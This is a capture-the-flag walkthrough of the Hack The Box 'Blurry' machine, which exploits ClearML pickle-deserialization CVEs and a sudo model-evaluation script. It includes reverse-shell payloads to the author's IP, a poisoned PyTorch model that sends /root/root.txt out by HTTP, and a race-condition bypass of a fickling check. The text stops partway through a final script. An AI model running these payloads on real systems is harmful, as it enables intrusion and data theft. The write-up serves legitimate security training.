Blurry

INTRODUCTION

Blurry was released as the eighth box in HTB’s Season V, Anomalies. This box is all about attacking an AI/ML platform called ClearML. ClearML is a system for orchestrating various AI/ML platforms, running models and experiments on a remote server. It has an extensive Python API, which we use repeatedly while solving this box. This box is on the easier side of “medium”, but was still a reasonable challenge.

This box only has http and ssh, so recon is very straightforward, consisting of little more than a subdomain scan. You don’t even need to do any directory enumeration. You’ll discover a few subdomains, all of which are related to ClearML. One of them only provides a hint, but the other two are used in foothold.

Achieving a foothold took a few tries and a little creativity, but all of the information you need is already documented by a blog that disclosed the relevant CVEs. I didn’t find any PoC code, so it’s likely you’ll have to write it yourself. The code shown in the blog post is very useful, but is not enough to get you all the way to a foothold - read very carefully the pitfalls the authors experienced, and you’ll have a better idea of how to exploit Blurry for a foothold.

The user flag is available right after gaining foothold, but the root flag is where your journey could take two paths. A little bit of local enumeration leads you to an important script on the box. One way (likely unintended by the author of the box) is very easy: it’s a misconfiguration you may have encountered when doing the “Starting Point” path on HTB. The other way takes a little fiddling, but isn’t too tough either: very careful code analysis will reveal some insecurely-written logic in a sudo-able script.

All in all, this was a fantastic box. Highly recommend it!

title picture

RECON

nmap scans

Port scan

For this box, I’m running my typical enumeration strategy. I set up a directory for the box, with an nmap subdirectory. Then I set $RADDR to the target machine’s IP, and scanned it with a simple but broad port scan:

sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Script scan

To investigate a little further, I ran a script scan over the TCP ports I just found:

TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`
sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR
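If the grep/sed/tr pipeline above is hard to read, the same extraction can be sketched in Python. This is only an illustration: the function name open_tcp_ports is my own, and unlike the grep pattern it keeps only ports whose state is "open", which is an assumption about what you want to feed into the script scan.

```python
import re


def open_tcp_ports(nmap_output: str) -> str:
    """Return the open TCP ports from nmap's normal output as 'p1,p2,...'."""
    # Match lines such as "22/tcp open  ssh" and capture the port number.
    ports = re.findall(r"^(\d+)/tcp\s+open\b", nmap_output, flags=re.MULTILINE)
    return ",".join(ports)


# Sample taken from the port scan output shown earlier.
sample = """PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
"""

print(open_tcp_ports(sample))  # 22,80
```

The result has the same shape as $TCPPORTS, so it can be passed straight to nmap's -p option.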

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/

Vuln scan

Now that we know what services might be running, I’ll do a vulnerability scan:

sudo nmap -n -Pn -p$TCPPORTS -oN nmap/vuln-scan-tcp.txt --script 'safe and vuln' $RADDR

No results from the vuln scan.

UDP scan

To be thorough, I also did a scan over the common UDP ports:

sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR

No results from scanning the top 100 UDP ports.

Webserver Strategy

Noting the redirect from the nmap scan, I added app.blurry.htb to /etc/hosts and did banner grabbing on that domain:

DOMAIN=blurry.htb
echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts
echo "$RADDR app.$DOMAIN" | sudo tee -a /etc/hosts

☝️ I use tee instead of the append operator >> so that I don’t accidentally blow away my /etc/hosts file with a typo of > when I meant to write >>.

whatweb --aggression 3 http://app.blurry.htb && curl -IL http://$RADDR

whatweb

Next I performed vhost and subdomain enumeration:

WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"
ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.htb" -c -t 60 -o fuzzing/vhost-root.md -of md -timeout 4 -ic -ac -v

No result there. I’ll assume that the only domain is blurry.htb. Now I’ll check for subdomains of blurry.htb - maybe it’s not only app.blurry.htb?

ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.$DOMAIN" -c -t 60 -o fuzzing/vhost-$DOMAIN.md -of md -timeout 4 -ic -ac -v

subdomain enumeration

Aha! There are at least two additional subdomains. I’ll add them to /etc/hosts before continuing:

echo "$RADDR files.$DOMAIN" | sudo tee -a /etc/hosts
echo "$RADDR chat.$DOMAIN" | sudo tee -a /etc/hosts

I’ll move on to directory enumeration on app.blurry.htb, chat.blurry.htb and files.blurry.htb:

WLIST="/usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt";
ffuf -w $WLIST:FUZZ -u http://files.$DOMAIN/FUZZ -t 80 -c -o ffuf-directories-files -of json -e .php,.html,.txt -timeout 1 -v;

No results there. What about chat?

ffuf -w $WLIST:FUZZ -u http://chat.$DOMAIN/FUZZ -t 80 -c -o ffuf-directories-chat -of json -e .php,.html,.txt -timeout 1 -v;

Nothing important. And app?

ffuf -w $WLIST:FUZZ -u http://app.$DOMAIN/FUZZ -t 80 -c -o ffuf-directories-app -of json -e .php,.html,.txt -timeout 1 -v;

The results were only directories that can be easily found by traversing/spidering the website.

Exploring the Website

The subdomain from the original http redirect shows a simple logon page for ClearML. Just enter a name to proceed:

app index

This leads to the ClearML web app, which has many features:

app dashboard

The dashboard shows a couple of recent projects. I’ll investigate more after checking the other two subdomains.

The chat.blurry.htb subdomain shows some kind of chat web app, with a window title of Blurry Vision.

chat index

I registered an account using the credentials jimbob : password123 and logged in. There’s one message notification waiting for me. Checking it out, I see that there is a prior conversation that my new user has just entered:

chat history

The DevOps platform that irisview is referring to might be ClearML itself. It’s also good to see that jippity is tagged as an Admin.

Vulnerability Research

ClearML

Since the name “ClearML” fits quite nicely with the name of the box, I decided to begin my search for vulnerabilities (or any prior works) with that. Thankfully, not too much searching led to a very helpful article written by a team that found six zero-days in ClearML!

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

They included a handy video for each vulnerability. The one below even shows quite clearly that the files.blurry.htb subdomain is the fileserver (that usually runs on port 8081) and is vulnerable to an LFI:

On that same post, there is an even more powerful technique shown: uploading a malicious pickle and having the target deserialize it. If all goes according to plan, this might be a way to get RCE quite easily:

I’ll investigate this method after I finish researching the web services running on the target 🚩

Rocket Chat

There is a HackTricks page on how to abuse Rocket Chat to lead to RCE. However, it requires setting up a webhook, something that it seems my low-priv jimbob user lacks access to.

It seems that there is also an exploit for CVE-2021-22911 that involves NoSQL injection to gain an administrator’s auth token. It says this exploit will work for Rocket Chat 3.12.1 - so what version are we using? It doesn’t seem to say anywhere in the UI.

Thankfully, a reply in the Rocket Chat github repo Issues shows that it’s possible to find the version by checking http://chat.blurry.htb/api/info:

rocket chat version

I.e. the exploit for CVE-2021-22911 will not be useful here.

FOOTHOLD

ClearML Pickle Deserialization

If I’m not mistaken, I should be able to use two of the techniques shown in the article mentioned above - combining CVE-2024-24592 (“Improper Auth Leading to Arbitrary Read-Write Access”) with CVE-2024-24590 (“Pickle Load on Artifact Get”) to achieve RCE.

Here’s an overview of the steps:

Start a reverse shell listener
Locate the Task ID of some task I want to utilize (or create my own?)
Write a Python class with a malicious __reduce__() function. Create an object from that class and pickle it into a file.
Utilize CVE-2024-24592 to upload the pickle as an artifact to the target Task.
Attempt to access the pickle, thus utilizing CVE-2024-24590 to execute the payload (reverse shell?)
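The core of the third step is how pickle treats __reduce__(). Here is a harmless sketch of the mechanism, assuming nothing beyond the standard library: the class name Harmless and the choice of sorted() as the callable are mine, standing in for the os.system call a real payload would use.

```python
import pickle


class Harmless:
    def __reduce__(self):
        # pickle stores (callable, args). On load, it calls callable(*args)
        # and uses the return value in place of the original object.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Harmless())

# Loading never rebuilds a Harmless instance; it simply runs sorted([3, 1, 2]).
result = pickle.loads(blob)
print(result)  # [1, 2, 3]
```

Whoever calls pickle.loads() is the one who runs the callable, which is why it matters so much where the deserialization happens.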

Let’s prepare for this attack scenario. First, I’ll prepare the reverse shell listener:

sudo ufw allow from $RADDR to any port 4444 proto tcp
ip a s tun0  # (My address is 10.10.14.12)
bash
nc -lvnp 4444

Next, prepare a python venv and install clearml:

cd exploit
python3 -m venv .
source bin/activate
pip3 install clearml

Now write a malicious class and pickle it. pickleme.py:

import os, pickle

class RunCommand():
    def __reduce__(self):
        return (os.system, ("bash -c 'sh -i >& /dev/tcp/10.10.14.12/4444 0>&1'",))

command = RunCommand()

with open('revshell.pkl', 'wb') as f:
    pickle.dump(command, f)

python3 pickleme.py

This successfully created the malicious pickle, written into revshell.pkl. Now I’ll need to upload this pickle as an artifact. According to the docs, I’ll need to locate a valid Task ID. I’ll do this by browsing the experiments of the “Black Swan” project.

finding task ID

To upload the pickle, I’ll use the clearml python API again:

from clearml import Task

target_task = 'fa54c922dd4d449494c5c00192819e88'
task = Task.get_task(task_id=target_task)

task.upload_artifact(name='pickle_artifact',
                     artifact_object='revshell.pkl', 
                     retries=2,
                     wait_on_upload=True,
                     extension_name='.pkl')

python3 upload_artifact.py

As expected, this didn’t work - how would my attacker box know where to upload the artifact to?

Initializing ClearML

clearml.backend_api.session.defs.MissingConfigError: It seems ClearML is not configured on this machine! To get started with ClearML, setup your own 'clearml-server' or create a free account at https://app.clear.ml Setup instructions can be found here: https://clear.ml/docs

Thankfully, the documentation it links to actually has some helpful instructions on initializing our connection to the ClearML server:

clearml-init

This runs a wizard for configuring ClearML locally. It first asks us to generate some credentials, which are available through the web app (app.blurry.htb) via the user’s Settings > Workspace then generating new credentials:

creating clearml creds

api { 
    web_server: http://app.blurry.htb
    api_server: http://api.blurry.htb
    files_server: http://files.blurry.htb
    credentials {
        "access_key" = "CAY3C2MLVYI6XK719N9E"
        "secret_key"  = "4pk2Tg1BzdDAggz39FCeT5c73cbHB0L0SbQn6osQChTewLCcxI"
    }
}

This configuration references api.blurry.htb - did I miss a subdomain?

api subdomain

Oof! I did miss that subdomain 😬 I’ll add that to /etc/hosts and initialize ClearML:

echo "$RADDR api.$DOMAIN" | sudo tee -a /etc/hosts
clearml-init

configured clearml

Perfect. It seems like it initialized properly.

Uploading an artifact

Now let’s try that upload script again:

failed to upload

Hmm… I guess it failed because the task I’m using already has the published status? A little more reading of the blog disclosing these CVEs let me know that they actually didn’t upload to an existing task - they instead made a new one:

When we first tried to exploit this, we realized that using the upload_artifact method, as seen in Figure 5, will wrap the location of the uploaded pickle file in another pickle. Upon discovering this, we created a script that would interface directly with the API to create a task and upload our malicious pickle in place of the file path pickle.

They say to upload the “malicious pickle in place of the file path pickle”. I suppose that means I shouldn’t save the pickle into a file; I should instead upload the object directly. I’ll modify upload_artifact.py accordingly - basically merging my two scripts into one:

from clearml import Task
import os, pickle

class RunCommand():
    def __reduce__(self):
        cmd = "bash -c 'sh -i >& /dev/tcp/10.10.14.12/4444 0>&1'"
        return (os.system, (cmd,))

command = RunCommand()
task = Task.init(project_name='White Swan',
                 task_name='my_artifact_upload',
                 output_uri=True)
task.upload_artifact(name='pickle_artifact',
                     artifact_object=command, 
                     retries=2,
                     wait_on_upload=True, 
                     extension_name=".pkl")
artifact = task.artifacts.get('pickle_artifact')
pickle_local_path = artifact.get()

I’ll delete the project I just initialized, and try again using this new version of upload_artifact.py:

deleting project

☝️ You’ll need to go into the project and archive the task inside before you’ll be allowed to delete the project.

upload success

That process hangs, and a reverse shell opens! 🙂

failed reverse shell

But the reverse shell is to… myself? 🙃

Usable reverse shell

I once again read the notes on CVE-2024-24590 from the blog post on disclosing the ClearML CVEs, and found some subtle wording that I hadn’t noticed before:

“When a user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.”

That’s right, the pickle is deserialized “on their system” - The mistake I made is that it’s my system making the call to artifact.get(). I need to find a way to get the target to call the Artifact get() method instead of me!

Thankfully, the trick was sitting in plain sight. There is a task running in the “Black Swan” project every three minutes, called “Review JSON Artifacts”. Here’s the code it’s running:

#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient

def process_json_artifact(data, artifact_name):
    """
    Process a JSON artifact represented as a Python dictionary.
    Print all key-value pairs contained in the dictionary.
    """
    print(f"[+] Artifact '{artifact_name}' Contents:")
    for key, value in data.items():
        print(f" - {key}: {value}")

def process_task(task):
    artifacts = task.artifacts
    
    for artifact_name, artifact_object in artifacts.items():
        data = artifact_object.get()
        
        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")

def main():
    review_task = Task.init(project_name="Black Swan", 
                            task_name="Review JSON Artifacts", 
                            task_type=Task.TaskTypes.data_processing)

    # Retrieve tasks tagged for review
    tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

    if not tasks:
        print("[!] No tasks up for review.")
        return
    
    threads = []
    for task in tasks:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        p = Process(target=process_task, args=(task,))
        p.start()
        threads.append(p)
        task.set_archived(True)

    for thread in threads:
        thread.join(60)
        if thread.is_alive():
            thread.terminate()

    # Mark the ClearML task as completed
    review_task.close()

def cleanup():
    client = APIClient()
    tasks = client.tasks.get_all(
        system_tags=["archived"],
        only_fields=["id"],
        order_by=["-last_update"],
        page_size=100,
        page=0,
    )

    # delete and cleanup tasks
    for task in tasks:
        # noinspection PyBroadException
        try:
            deleted_task = Task.get_task(task_id=task.id)
            deleted_task.delete(
                delete_artifacts_and_models=True,
                skip_models_used_by_other_tasks=True,
                raise_on_error=False
            )
        except Exception as ex:
            continue

if __name__ == "__main__":
    main()
    cleanup()

There’s a call to the Artifact get() method in process_task(). Therefore, it’s the owner of the process running this task (jippity) that would be opening the reverse shell.

How do we get the process_task() code to run? The script fetches every task in the “Black Swan” project that is tagged with “review” and calls get() on each of that task’s artifacts, so I’ll modify my upload_artifact.py to create such a task:

from clearml import Task
import os, pickle

class RunCommand():
    def __reduce__(self):
        cmd = "bash -c 'sh -i >& /dev/tcp/10.10.14.12/4444 0>&1'"
        return (os.system, (cmd,))

command = RunCommand()
task = Task.init(project_name='Black Swan',
                 task_name='my_artifact_upload',
                 tags='review',
                 output_uri=True)

task.upload_artifact(name='pickle_artifact',
                     artifact_object=command, 
                     retries=2,
                     wait_on_upload=True, 
                     extension_name=".pkl")
#artifact = task.artifacts.get('pickle_artifact')
#pickle_local_path = artifact.get()

I’ll once again run this code:

python3 upload_artifact.py

Then, after waiting a few minutes, a reverse shell opened!

reverse shell success

And this time it’s actually another user 😁 As expected, we opened a reverse shell as jippity.

USER FLAG

Upgrade the shell

I’ll follow the process outlined in my guide on upgrading the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
[Ctrl+Z] stty raw -echo; fg [Enter] [Enter] 
export TERM=xterm-256color
export SHELL=bash
stty rows 35 columns 120

Get the flag

The reverse shell opens at /home/jippity, adjacent to the user flag.

user flag

Simply cat it out for the points:

cat user.txt

SSH

The /home/jippity directory also has .ssh, with a key sitting inside. We can simply read the key and transfer it back to the attacker machine, for an easy way to get back in without re-exploiting:

found ssh

Write a new id_rsa file and copy in the contents. Then just change permissions and use the key for login:

cd loot
vim id_rsa  # copy in the key contents
chmod 600 id_rsa
ssh -i id_rsa jippity@$RADDR

ssh as jippity

ROOT FLAG

Local enumeration: jippity

The home directory has more contents than just the flag and SSH though. There is some stuff pertaining to ClearML. clearml.conf has an API access & secret key:

"access_key": "8TL83TDO2YXCQ4789DE4", 
"secret_key": "peFoHVcUTMA0JdhOHNoQTioLSmtbKEiAVxZXJSHku4LyHlOTUB"

Surprisingly, I was able to get the sudo list for jippity without any password:

sudo list

☝️ As usual, that’s a pretty strong indicator of a privesc vector.

Since that’s clearly a custom binary, let’s check if there’s any source code for it sitting around:

evaluate model 2

The evaluate_model.py contents are as follows:

import subprocess
import sys

def run_command(command):
    """Helper function to run a command in the shell."""
    try:
        result = subprocess.run(command, check=True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        print(result.stdout.decode())
    except subprocess.CalledProcessError as e:
        print(f"Error occurred: {e.stderr.decode()}")
        sys.exit(1)

def create_user(username, password):
    """Creates a new user with the specified username and password."""
    # Create the user with the specified username
    run_command(f"sudo useradd -m {username}")

    # Set the user's password
    run_command(f"echo '{username}:{password}' | sudo chpasswd")

    # Add the user to the sudo group
    run_command(f"sudo usermod -aG sudo {username}")

if __name__ == "__main__":
    # Define username and password here
    username = "admin"
    password = "password"

    create_user(username, password)
    print(f"User '{username}' has been created and added to the sudo group.")

Haha it’s like they’re taunting us with that run_command() function 😂

The shell script at /usr/bin/evaluate_model has the following contents:

#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"  

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
    
fi

Oh? It looks like this whole shell script is just for “sanitizing” the pth file that is passed to the evaluate_model.py script. It does all this sanitization, but fails to mitigate the more obvious risk - that the evaluate_model.py script is modifiable by a low-priv user!

We can sudo /usr/bin/evaluate_model, which in turn runs the python script, so why not just edit the python script? There’s even a handy function within the script that helps us abuse it 👀
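Before editing anything, the misconfiguration can be confirmed with a quick permissions check. The sketch below is my own helper (describe_write_access is a hypothetical name) and it runs against a throwaway temp file; on the box you would point it at /models/evaluate_model.py instead.

```python
import os
import stat
import tempfile


def describe_write_access(path):
    """Summarize who can modify a file, as seen by the current user."""
    st = os.stat(path)
    return {
        "mode": stat.filemode(st.st_mode),          # e.g. "-rw-r--r--"
        "writable_by_me": os.access(path, os.W_OK),  # can the caller write to it?
        "world_writable": bool(st.st_mode & stat.S_IWOTH),
    }


# Throwaway file standing in for the real script.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    demo_path = tmp.name
os.chmod(demo_path, 0o644)
print(describe_write_access(demo_path))
os.remove(demo_path)
```

If writable_by_me comes back True for a script that a sudo rule ends up executing, that is the whole privesc.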

First, I’ll set up another reverse shell listener:

sudo ufw allow from $RADDR to any port 4445 proto tcp
bash
nc -lvnp 4445

Modify the script to use a simple nc reverse shell (tested on the jippity user first, which was successful):

changes to evaluate_model

Finally, just run the binary using any “safe” model, such as the demo_model.pth:

sudo /usr/bin/evaluate_model /models/demo_model.pth &

And we get a reverse shell as root!

root reverse shell

🍍 That’s all there is to it - the root flag is in the usual spot, at /root/root.txt. Simply cat it out to finish the box:

cat /root/root.txt

EXTRA CREDIT: ALTERNATE PRIVESC

Aside: what the pth

Running file over the .pth file reveals that it’s actually a zip archive. Let’s transfer it back to my attacker machine and take a look inside. To do this, I’ll start up an http server and upload demo_model.pth:

👇 I’m using my own tool, simple-http-server. It’s just a slight improvement on Python http.server, a lot like a PHP server, but with a few advantages for file upload and data exfiltration using base64.

sudo ufw allow from $RADDR to any port 8000 proto tcp
cd loot
simple-server 8000 -v

Then upload the file from the target:

upload model

Unzipping this file on my attacker machine, I see that it contains a bunch of data and a pickle:

demo model
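The same look inside can be done without unzipping to disk. This is a minimal sketch using the standard zipfile module; find_pickles is my own name, and its filter mirrors the find expression in /usr/bin/evaluate_model (files ending in .pkl, or named pickle). The in-memory archive is a stand-in for demo_model.pth, and the version entry in it is an assumption about what else such an archive contains.

```python
import io
import zipfile


def find_pickles(archive):
    """List archive members that the evaluate_model script would scan."""
    with zipfile.ZipFile(archive) as zf:
        return [name for name in zf.namelist()
                if name.endswith(".pkl") or name.split("/")[-1] == "pickle"]


# Stand-in archive built in memory; a real run would pass the .pth path.
demo = io.BytesIO()
with zipfile.ZipFile(demo, "w") as zf:
    zf.writestr("smaller_cifar_net/data.pkl", b"placeholder")
    zf.writestr("smaller_cifar_net/version", b"3\n")
demo.seek(0)

print(find_pickles(demo))
```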

I’d love to just examine this pickle directly, but it looks like I have to actually load the pickle before I can see the source code contained inside. Here’s how I’ll get the code:

import sys
import pickle
#import pickletools
import inspect

filepath = sys.argv[1]
with open(filepath, 'rb') as file:
    #pickletools.dis(file)
    obj = pickle.load(file)
    if inspect.isfunction(obj) or inspect.isclass(obj):
        source_code = inspect.getsource(obj)
        print(source_code)

However, running this makes the interpreter complain that I don’t have torch installed, so I’ll go get it:

python3 -m venv .
source bin/activate
pip3 install torch  # Requires at least 1.5GB of downloads
pip3 install torchvision

As this is downloading, I’m wondering to myself: is it even necessary to load the code in this pickle? After all, we know this pickle is being loaded by the target, so maybe the privesc here is to simply make my own pickle and package it into my own .pth file? 🤔
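As an aside, it is possible to see which modules a pickle would import without loading it at all, which also avoids needing torch just to peek. The sketch below uses pickletools.genops from the standard library. list_imports is my own helper, and its handling of STACK_GLOBAL (taking the last two strings seen) is a simplifying heuristic that can be fooled by memoized strings, so treat the output as a hint rather than a verdict.

```python
import collections
import pickle
import pickletools


def list_imports(data: bytes):
    """Return (module, name) pairs referenced by a pickle, without loading it."""
    found = []
    strings = []  # string arguments seen so far, used for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols store "module name" as a single argument.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+ pushes module and name as two separate strings.
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


# Benign stand-in: a pickled reference to collections.OrderedDict.
blob = pickle.dumps(collections.OrderedDict, protocol=4)
print(list_imports(blob))
```

Running this over data.pkl from the extracted model would list the classes it needs, and an entry pointing at something like os or subprocess would be an obvious red flag.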

Detecting model version

There’s a tool called fickling that specializes in both creating and detecting pickles used in AI/ML.

pip3 install fickling

Now we can use fickling to detect the type of model that demo_model.pth is using:

import fickling.polyglot as polyglot
filename = '../loot/smaller_cifar_net/data.pkl'
potential_formats = polyglot.identify_pytorch_file_format(filename, print_results=True)
potential_formats_legacy = polyglot.identify_pytorch_file_format(filename, print_results=True)

existing model version

It seems confident the existing model is PyTorch v0.1.10. Is that important? Not sure yet.

Malicious pickle in the model

There’s another feature that fickling claims will inject arbitrary python code into a model. Check out their PoC example as a reference. Here’s my thinned-down version:

import sys
import torch
import torchvision.models as models
from fickling.pytorch import PyTorchModelWrapper

if len(sys.argv) < 3:
    print(f'Usage: {sys.argv[0]} <pickle_file> <cmd>')
    sys.exit()
    
FILEPATH = sys.argv[1]
CMD = sys.argv[2]

# Load example PyTorch model
model = models.mobilenet_v2()
torch.save(model, FILEPATH)

# Wrap model file into fickling
result = PyTorchModelWrapper(FILEPATH)

# Inject payload, overwriting the existing file instead of creating a new one
temp_filename = "temp_filename.pt"
result.inject_payload(
    CMD,
    temp_filename,
    injection="insertion",
    overwrite=True,
)

I’ll run the script, then prepare for an incoming reverse shell:

python3 inject_into_torch.py revsh.pth \
'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.12",4445));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
mv revsh.pth ../www/  # Directory that http server is serving
bash
nc -lvnp 4445

Now, from the target, I’ll download the model into a directory other than /models, copy it into /models, then run evaluate_model using my malicious .pth file.

👇 The /models directory is periodically cleaned-up. To avoid having to repeatedly download my malicious .pth, I’ll use another directory that isn’t affected by the cleanup script.

curl -o /tmp/.Tools/revsh.pth http://10.10.14.12:8000/revsh.pth
cp /tmp/.Tools/revsh.pth /models/ && sudo /usr/bin/evaluate_model /models/revsh.pth

However, it fails to execute. The message indicates that the target is also using fickling to test whether or not the model is malicious. Talk about fighting fire with fire:

fickling fail

😂 Yeah, I guess that was “overtly malicious”… Maybe I should be more subtle?

Instead of a reverse shell, I’ll just make a web request to exfiltrate the root flag contents. Here’s the new payload:

import base64, requests; contents = base64.b64encode(open('/root/root.txt', 'rb').read()).decode('utf-8'); requests.get(f'http://10.10.14.12:8000/?b64={contents}')
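On the receiving end, the b64 parameter has to be pulled out of the request path and decoded. Here is a small sketch of that step, assuming the listener logs the raw request path; decode_exfil is my own helper name. One detail worth handling: standard base64 can contain "+", which query-string parsing turns into a space, so the sketch restores it before decoding.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_path: str) -> bytes:
    """Decode the ?b64=... parameter from a logged request path."""
    values = parse_qs(urlsplit(request_path).query).get("b64", [])
    if not values:
        raise ValueError("no b64 parameter in request path")
    # parse_qs decodes '+' as a space; put it back before base64-decoding.
    return base64.b64decode(values[0].replace(" ", "+"))


# Round trip with placeholder data (not a real flag).
secret = b"0123456789abcdef0123456789abcdef\n"
path = "/?b64=" + base64.b64encode(secret).decode("utf-8")
print(decode_exfil(path) == secret)  # True
```

Switching the payload to base64.urlsafe_b64encode (and decoding with urlsafe_b64decode) would avoid the "+" problem entirely.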

First, I’ll test this idea with the user flag:

exfil test 2

Yep, that works perfectly - now let’s wrap that into a fresh pth file:

python3 inject_into_torch.py exfil.pth \
"import base64, requests; contents = base64.b64encode(open('/root/root.txt', 'rb').read()).decode('utf-8'); requests.get(f'http://10.10.14.12:8000/?b64={contents}')"
mv exfil.pth ../www/

Then, from the target via SSH:

curl -o /tmp/.Tools/exfil.pth http://10.10.14.12:8000/exfil.pth
cp /tmp/.Tools/exfil.pth /models/ && sudo /usr/bin/evaluate_model /models/exfil.pth

Same result! /usr/bin/evaluate_model claims the model is “overtly malicious” 🙄

Tricking evaluate_model

Taking a closer look at /usr/bin/evaluate_model we can actually see that there is a coding error. We can trick evaluate_model’s use of fickling by introducing a race condition! Take another look at the end of /usr/bin/evaluate_model to see why.

# ...
if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi

The script assumes that if the provided .pth file is still present by the time this clause is executed, it was actually deemed safe by fickling. It’s a subtle bug, but definitely one we can exploit.

This bug could have been avoided by a pretty easy change to the script:
Generate a random number or hash, and make a temporary filename [random_number]_model.pth
Using the elevated process, copy the model provided as an argument over to any other directory, perhaps /tmp/[random_number]_model.pth
Run the fickling safety check on this temp file that has a randomized name, instead of the one provided as an argument.
Run /usr/bin/python3 "$PYTHON_SCRIPT" [random_number]_model.pth instead of the code shown above.
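The fix described above can be sketched in Python as follows. This is an illustration of the idea, not a drop-in replacement for the script: evaluate_private_copy is my own name, and is_malicious and run_model are hypothetical callables standing in for the fickling check and for evaluate_model.py.

```python
import os
import shutil
import tempfile


def evaluate_private_copy(model_path, is_malicious, run_model):
    """Scan and run a private copy so the caller cannot swap the file mid-check."""
    # mkstemp picks a random name and creates the file readable and writable
    # only by the user running this code (root, when invoked through sudo).
    fd, private_copy = tempfile.mkstemp(suffix="_model.pth")
    os.close(fd)
    try:
        shutil.copyfile(model_path, private_copy)
        if is_malicious(private_copy):
            return False
        # The file that was scanned is exactly the file that gets run.
        run_model(private_copy)
        return True
    finally:
        os.remove(private_copy)
```

The decision is now a return value from the scan rather than "does the original file still exist", so replacing the original path afterwards changes nothing.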

In short, we can exploit this by constantly copying over the malicious model. That way, if we’re lucky at least one of the copy operations will occur when evaluate_model is between these two lines:

/bin/rm "$MODEL_FILE"
# ...
if [ -f "$MODEL_FILE" ]; then
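To make the window concrete, here is a deterministic simulation of the flawed logic. It is a sketch under my own naming: flawed_check mimics the delete-then-check-existence pattern, and the window callback stands in for whatever another process does between the rm and the [ -f ] test. On the real box the timing is a matter of luck, which is why the copy has to run in a loop.

```python
import os
import tempfile


def flawed_check(model_path, looks_malicious, window=lambda: None):
    """Mimic the script: delete if malicious, then trust whatever file exists."""
    if looks_malicious(model_path):
        os.remove(model_path)
    window()  # stands in for the gap between `rm` and `[ -f "$MODEL_FILE" ]`
    return os.path.isfile(model_path)  # True means "considered safe"


with tempfile.TemporaryDirectory() as workdir:
    target = os.path.join(workdir, "test.pth")

    def drop_file():
        with open(target, "w") as f:
            f.write("malicious")

    drop_file()
    without_race = flawed_check(target, lambda p: True)

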